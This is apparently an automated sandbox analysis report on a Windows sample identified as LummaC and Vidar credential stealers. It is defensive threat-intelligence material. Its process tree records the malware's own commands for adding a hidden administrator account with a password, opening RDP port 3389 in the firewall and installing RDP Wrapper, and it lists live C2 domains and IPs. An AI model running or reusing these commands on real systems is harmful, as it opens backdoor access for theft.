Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519866
MD5:	2ff6b812f5ca9d29a5007366f38b6f34
SHA1:	261344946fe8e06368b6385a0c815e1b99b89e49
SHA256:	2a8ad4c9af3031fde7d322613cfba967c63ff6e5657c74ba8693050039f07f6e
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a new user with administrator rights

Allocates memory in foreign processes

Allows multiple concurrent remote connection

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Enables remote desktop connection

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Modifies the windows firewall

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2FF6B812F5CA9D29A5007366F38B6F34)

conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2004 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 3172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GIEHJDHCBA.exe (PID: 3084 cmdline: "C:\ProgramData\GIEHJDHCBA.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BKKFCFBKFC.exe (PID: 4304 cmdline: "C:\ProgramData\BKKFCFBKFC.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

CFHIIEHJKK.exe (PID: 6956 cmdline: "C:\ProgramData\CFHIIEHJKK.exe" MD5: 3FCBAACCA9CC6DCCF0649F5ABB8B73EB)

cmd.exe (PID: 6740 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6488 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 5956 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 3868 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDPWInst.exe (PID: 1448 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)

netsh.exe (PID: 1460 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 6336 cmdline: "cmd.exe" /c net user RDPUser_0d457744 eU6fmVsXHNUV /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 4324 cmdline: net user RDPUser_0d457744 eU6fmVsXHNUV /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 2012 cmdline: C:\Windows\system32\net1 user RDPUser_0d457744 eU6fmVsXHNUV /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 6188 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 2584 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 4664 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 6772 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 5908 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 5128 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_0d457744 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6444 cmdline: net localgroup "Administrators" RDPUser_0d457744 /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6392 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_0d457744 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 2664 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHDAKKJJJKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 4828 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 77FF15B9237D62A5CBC6C80E5B20A492)

rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)

tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["fragnantbui.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "offensivedzvju.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\CFHIIEHJKK.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001E.00000000.2065902266.0000000000401000.00000020.00000001.01000000.00000010.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001E.00000002.2111865526.0000000000450000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6936	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 1092	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1092	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 1092	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1092	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 5640	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5640	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CFHIIEHJKK.exe PID: 6956	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RDPWInst.exe PID: 1448	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author
16.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
16.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
20.0.CFHIIEHJKK.exe.c10000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.file.exe.41f5570.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.41f5570.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
2.2.file.exe.41f5570.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.41f5570.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
6.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
6.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
6.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
6.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
30.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
30.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
30.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
30.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\ProgramData\CFHIIEHJKK.exe, Initiated: true, ProcessId: 6956, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49764

Sigma detected: RDP Sensitive Settings Changed

Source: Registry Key set

Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 1448, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_0d457744 eU6fmVsXHNUV /add, CommandLine: net user RDPUser_0d457744 eU6fmVsXHNUV /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_0d457744 eU6fmVsXHNUV /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6336, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_0d457744 eU6fmVsXHNUV /add, ProcessId: 4324, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6740, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6488, ProcessName: net.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6740, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6488, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:37:35.711646+0200	2028765	3	Unknown Traffic	192.168.2.7	49711	5.75.211.162	443	TCP
2024-09-27T01:37:37.718574+0200	2028765	3	Unknown Traffic	192.168.2.7	49712	5.75.211.162	443	TCP
2024-09-27T01:37:39.068861+0200	2028765	3	Unknown Traffic	192.168.2.7	49713	5.75.211.162	443	TCP
2024-09-27T01:37:41.400790+0200	2028765	3	Unknown Traffic	192.168.2.7	49714	5.75.211.162	443	TCP
2024-09-27T01:37:42.765181+0200	2028765	3	Unknown Traffic	192.168.2.7	49715	5.75.211.162	443	TCP
2024-09-27T01:37:44.274576+0200	2028765	3	Unknown Traffic	192.168.2.7	49716	5.75.211.162	443	TCP
2024-09-27T01:37:45.209543+0200	2028765	3	Unknown Traffic	192.168.2.7	49717	5.75.211.162	443	TCP
2024-09-27T01:37:48.389796+0200	2028765	3	Unknown Traffic	192.168.2.7	49718	5.75.211.162	443	TCP
2024-09-27T01:37:49.463856+0200	2028765	3	Unknown Traffic	192.168.2.7	49719	5.75.211.162	443	TCP
2024-09-27T01:37:50.826974+0200	2028765	3	Unknown Traffic	192.168.2.7	49720	5.75.211.162	443	TCP
2024-09-27T01:37:51.776067+0200	2028765	3	Unknown Traffic	192.168.2.7	49721	5.75.211.162	443	TCP
2024-09-27T01:37:53.505808+0200	2028765	3	Unknown Traffic	192.168.2.7	49722	5.75.211.162	443	TCP
2024-09-27T01:37:55.262656+0200	2028765	3	Unknown Traffic	192.168.2.7	49723	5.75.211.162	443	TCP
2024-09-27T01:37:56.811367+0200	2028765	3	Unknown Traffic	192.168.2.7	49724	5.75.211.162	443	TCP
2024-09-27T01:37:58.248322+0200	2028765	3	Unknown Traffic	192.168.2.7	49725	5.75.211.162	443	TCP
2024-09-27T01:37:59.524664+0200	2028765	3	Unknown Traffic	192.168.2.7	49726	5.75.211.162	443	TCP
2024-09-27T01:38:02.538742+0200	2028765	3	Unknown Traffic	192.168.2.7	49727	5.75.211.162	443	TCP
2024-09-27T01:38:04.020509+0200	2028765	3	Unknown Traffic	192.168.2.7	49728	5.75.211.162	443	TCP
2024-09-27T01:38:05.369878+0200	2028765	3	Unknown Traffic	192.168.2.7	49729	5.75.211.162	443	TCP
2024-09-27T01:38:06.928561+0200	2028765	3	Unknown Traffic	192.168.2.7	49731	5.75.211.162	443	TCP
2024-09-27T01:38:08.852868+0200	2028765	3	Unknown Traffic	192.168.2.7	49732	5.75.211.162	443	TCP
2024-09-27T01:38:10.898183+0200	2028765	3	Unknown Traffic	192.168.2.7	49733	5.75.211.162	443	TCP
2024-09-27T01:38:13.940509+0200	2028765	3	Unknown Traffic	192.168.2.7	49735	5.75.211.162	443	TCP
2024-09-27T01:38:16.113824+0200	2028765	3	Unknown Traffic	192.168.2.7	49738	5.75.211.162	443	TCP
2024-09-27T01:38:17.990704+0200	2028765	3	Unknown Traffic	192.168.2.7	49741	5.75.211.162	443	TCP
2024-09-27T01:38:20.256563+0200	2028765	3	Unknown Traffic	192.168.2.7	49745	5.75.211.162	443	TCP
2024-09-27T01:38:49.901702+0200	2028765	3	Unknown Traffic	192.168.2.7	49754	5.75.211.162	443	TCP
2024-09-27T01:38:51.171301+0200	2028765	3	Unknown Traffic	192.168.2.7	49755	5.75.211.162	443	TCP
2024-09-27T01:38:52.943000+0200	2028765	3	Unknown Traffic	192.168.2.7	49756	5.75.211.162	443	TCP
2024-09-27T01:38:54.289506+0200	2028765	3	Unknown Traffic	192.168.2.7	49757	5.75.211.162	443	TCP
2024-09-27T01:38:55.643595+0200	2028765	3	Unknown Traffic	192.168.2.7	49758	5.75.211.162	443	TCP
2024-09-27T01:38:57.646489+0200	2028765	3	Unknown Traffic	192.168.2.7	49759	5.75.211.162	443	TCP
2024-09-27T01:38:58.649763+0200	2028765	3	Unknown Traffic	192.168.2.7	49760	5.75.211.162	443	TCP
2024-09-27T01:39:01.719843+0200	2028765	3	Unknown Traffic	192.168.2.7	49761	5.75.211.162	443	TCP
2024-09-27T01:39:02.768673+0200	2028765	3	Unknown Traffic	192.168.2.7	49763	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:14.612339+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49736	172.67.194.216	443	TCP
2024-09-27T01:38:15.531775+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49737	172.67.132.32	443	TCP
2024-09-27T01:38:16.519151+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49739	188.114.96.3	443	TCP
2024-09-27T01:38:17.510845+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49740	188.114.96.3	443	TCP
2024-09-27T01:38:18.552744+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49742	188.114.96.3	443	TCP
2024-09-27T01:38:20.018932+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49744	172.67.162.108	443	TCP
2024-09-27T01:38:20.956709+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49746	188.114.96.3	443	TCP
2024-09-27T01:38:21.876920+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49748	188.114.97.3	443	TCP
2024-09-27T01:38:23.201154+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49749	104.21.77.130	443	TCP
2024-09-27T01:38:25.697143+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49751	172.67.128.144	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:14.612339+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49736	172.67.194.216	443	TCP
2024-09-27T01:38:15.531775+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49737	172.67.132.32	443	TCP
2024-09-27T01:38:16.519151+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49739	188.114.96.3	443	TCP
2024-09-27T01:38:17.510845+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49740	188.114.96.3	443	TCP
2024-09-27T01:38:18.552744+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49742	188.114.96.3	443	TCP
2024-09-27T01:38:20.018932+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49744	172.67.162.108	443	TCP
2024-09-27T01:38:20.956709+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49746	188.114.96.3	443	TCP
2024-09-27T01:38:21.876920+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49748	188.114.97.3	443	TCP
2024-09-27T01:38:23.201154+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49749	104.21.77.130	443	TCP
2024-09-27T01:38:25.697143+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49751	172.67.128.144	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:19.108263+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.7	49744	172.67.162.108	443	TCP

